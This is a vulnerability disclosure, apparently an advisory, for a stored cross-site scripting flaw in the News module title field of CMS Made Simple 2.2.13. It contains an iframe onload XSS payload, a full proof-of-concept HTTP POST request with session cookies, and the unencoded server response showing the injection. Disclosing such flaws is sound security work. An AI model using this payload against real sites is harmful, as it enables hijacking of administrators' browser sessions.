Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.13
Detailed Description:
Stored Cross-Site Scripting - CMS Made Simple 2.2.13
# Summary:
• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Stored
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com, misheljava@gmail.com
• Software : CMS Made Simple 2.2.13
• Product Version: 2.2.13
• Vulnerability Type : Injection
• Vulnerability : Cross Site Scripting (XSS) Stored
# Description:
CMS Made Simple version 2.2.13 suffer from reflective and persistent (Stored)
cross site scripting and html injection vulnerabilities.
Insufficient validation of user input on the authenticated part of the CMS Made
Simple web application exposes the application to persistent cross site
scripting (XSS) vulnerabilities.
These vulnerabilities enable potentially dangerous input from the user to be
accepted by the application and then embedded back in the HTML response of the
page returned by the web server.
When the News being viewed, e.g. by an administrative user, the
JavaScript code will be executed in the browser.
# Steps to Reproduce:
The attacker needs the appropriate permissions but non-Admin (can be Editor or
Designer user roles) in order to create News, Content, Directory, Shortcuts,
etc.
It was noted that the adding news function was found to be vulnerable to a
Stored Cross Site Scripting (XSS) vulnerability.
Login as editor > click on 'Content' > click on 'News' > Add/Edit 'News'> insert
XSS payloads into the Title's field and click submit. Now go and click Edit
again, and you will notice IFROME and XSS payload rendering in the browser.
When the News being viewed, e.g. by an administrative user, the JavaScript code
will be executed in the browser.
List of vulnerable parameter:
• m1_title
Attack vector:
"";"/><iframe/onload=alert('Title')>//
# HTTP Request:
POST /cmsms-2.2.13/admin/moduleinterface.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101
Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: multipart/form-data;
boundary=---------------------------17770739424898
Content-Length: 3445
Origin: http://localhost
Connection: close
Cookie:
6a048a268372a94a595fdec4fbda4134aa83a6e6=e5d7ffe9b2883f3ee16cbcab8b30cb7300acc36d%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiZ3VyYW1qIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJFdaNzlUc1JiOTI2c2pLbmlndmFlcS5QdGVjRTdFdmg1S0FlNnFQNlBMbXJqSFdIQW92Lk5tIn0%3D;
__c=233d48d93b73772c983; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc;
CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1
-----------------------------17770739424898
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
-----------------------------17770739424898
Content-Disposition: form-data; name="__c"
233d48d93b73772c983
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_submit"
Submit
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_title"
News Module Installed"";"/><iframe/onload=alert('Title')>//
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_category"
1
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_summary"
<p>test</p>
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_content"
<p>test</p>
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_status"
draft
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_news_url"
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_extra"
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Month"
12
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Day"
21
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Year"
2019
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Hour"
19
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Minute"
14
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Second"
46
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_searchable"
1
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Month"
12
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Day"
21
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Year"
2019
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Hour"
19
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Minute"
14
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Second"
46
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Month"
06
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Day"
18
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Year"
2020
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Hour"
19
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Minute"
14
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Second"
46
-----------------------------17770739424898
Content-Disposition: form-data; name="preview_template"
24
-----------------------------17770739424898
Content-Disposition: form-data; name="preview_returnid"
-1
-----------------------------17770739424898--
# Snip of HTTP Server response (output not encoded):
class="pageoverflow"><p class="pagetext"><label for="fld1">*Title:</label> <span
class="cms_help" data-cmshelp-key="News__help_article_title"
data-cmshelp-title="Title"><img class="cms_helpicon"
src="http://localhost/cmsms-2.2.13/admin/themes/OneEleven/images/icons/system/info.gif"
alt="Title" /></span></p><p class="pageinput"><input type="text" id="fld1"
name="m1_title" value="News Module
Installed"";"/><iframe/onload=alert('Title')>//" size="80" maxlength="255"
required/></p></div><div class="pageoverflow"><p class="pagetext"><label
for="fld2">*Category:</label> <span class="cms_help"
data-cmshelp-key="News__help_article_category"
data-cmshelp-title="Category"><img class="cms_helpicon"
src="http://localhost/cmsms-2.2.13/admin/themes/OneEleven/images/icons/system/info.gif"
alt="Category" /></span></p><p class="pageinput"><select name="m1_category"
id="fld2"><option value="1" selected="selected">General</option>
Back to List
